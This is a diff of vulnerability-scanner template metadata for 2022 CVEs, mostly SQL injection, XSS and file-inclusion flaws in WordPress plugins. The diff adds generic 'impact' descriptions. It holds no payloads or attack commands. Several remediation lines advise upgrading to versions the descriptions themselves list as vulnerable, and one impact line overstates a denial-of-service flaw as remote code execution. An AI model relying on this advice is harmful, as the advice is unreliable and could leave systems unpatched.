100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site. remediation: | Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 3b1954d1ed..5dfd9a50e7 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 7061f1efa8..241177c187 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to Documentor version 1.5.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 3490241d59..235b7690d1 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to RevealJS postMessage version 4.3.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index bb2f339f37..a146aae90e 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to the latest version of the WordPress Nirweb Support plugin (2.8.2 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index bb6398b08d..e50aea7a46 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of WordPress Title Experiments Free plugin (9.0.1 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 26ab8912d7..2b5ff58a89 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database and potentially sensitive information leakage. remediation: | Update to the latest version of the WordPress Daily Prayer Time plugin (2022.03.01) to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 1cf1a32d17..fc06852b4e 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the KiviCare plugin (2.3.9) or apply the provided patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index 8f24319a60..c76c1e0dc9 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or manipulation of the WordPress database. remediation: | Update WP Fundraising Donation and Crowdfunding Platform to version 1.5.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 71a3931987..b6f5bc018d 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of the BadgeOS plugin (>=3.7.1) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 6824c4defe..586acc2faa 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Upgrade Webmin to version 1.990 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 76b3b0a8d3..c16ad06b0e 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of WP Video Gallery plugin (>=1.7.2) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 3e227b750b..f253291e99 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to WordPress Best Books plugin version 2.6.3 or later to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index a66e61b458..44286db737 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 2.14.15.1 reference: - https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4 diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 419e25b6cf..e9db28f6ac 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update UpdraftPlus plugin to version 1.22.9 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 113b66774b..66bc69ed10 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of ARPrice plugin (3.6.1) or apply the vendor-provided patch. reference: diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 2b214a1f50..f984dba146 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade to a patched version of nitely/spirit to mitigate the open redirect vulnerability (CVE-2022-0869). reference: diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index bb2b349f4e..c98111ac0f 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources. remediation: Fixed in version 0.12.5. reference: - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 89eaa0e9f4..6118c8b211 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + An attacker can execute arbitrary code on the target system, potentially leading to a complete compromise of the WordPress site. remediation: | Update to the latest version of the Member Hero plugin (1.0.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index efc383351e..37d85c5dd4 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Microweber to version 1.2.12 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 2b23308e86..0e66992fe6 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update the WordPress Order Listener for WooCommerce plugin to version 3.2.2 or later. reference: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 4701d4112b..91adca580d 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 6.930. reference: - https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index c08729256e..99801ac884 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue. reference: diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 9c924a9b54..aab74740aa 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index be64187d50..421e766e9a 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or denial of service. remediation: First name and last name input should be limited to 50 characters or maximum 100 characters. reference: - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/ diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 63fbe08423..d87307246d 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the user. remediation: | Update to WordPress Advanced Booking Calendar plugin version 1.7.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 0cd5365e21..8cb791d66d 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Personal Dictionary plugin before 1.3.4 contains a blind SQL injection vulnerability. The plugin fails to properly sanitize user-supplied POST data before being interpolated in an SQL statement and executed. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: Fixed in version 1.3.4. reference: - https://wpscan.com/vulnerability/eed70659-9e3e-42a2-b427-56c52e0fbc0d diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index dbd5af8cad..1d96bca45c 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. + impact: | + It allows remote code execution on the affected system. remediation: | Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 21d5d1cbc3..34e821c0f7 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the firewall. remediation: | Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index db1727b202..8d5fe3be53 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events, + impact: | + An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events. remediation: | Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later. reference: diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 8a3f9e0e6b..35da0cd6ab 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the Pricing Deals for WooCommerce plugin (2.0.2.03 or higher) to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 65268c52ea..a07329c66d 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 1af71e5270..bab829d586 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. remediation: | Update WordPress Simple File List to version 3.2.8 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 75f563dbea..19db4031a5 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE contains a hard-coded credentials vulnerability. A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML), allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Affected versions are 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions within the GitLab application. remediation: Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the reference section below. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 30cecbc7fc..ab08023a1f 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index d6b32bb527..3c6cabfda9 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Fixed in version 3.6.3 reference: - https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/ diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index a7fddb3f84..b51f3b8212 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of WordPress Fusion Builder plugin (3.6.2) or apply the vendor-provided patch. reference: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index e0273b3225..b1db92e50f 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by F5 Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index b63c6b5bb5..b072b67470 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. remediation: | Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 551b816e81..f47769a5ba 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information. remediation: | Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 3e4bf5c3a2..40ff9593af 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -5,6 +5,8 @@ info: author: Veshraj severity: high description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 1ab74a1b0b..9322c5fcb7 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress External Media without Import plugin through 1.1.2 is susceptible to authenticated blind server-side request forgery. The plugin has no authorization and does not ensure that media added via URLs are external media, which can allow any authenticated users, including subscribers, to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions, access internal resources, and potentially perform further attacks. remediation: | Upgrade to External Media without Import plugin version 1.1.2 or later. reference: diff --git 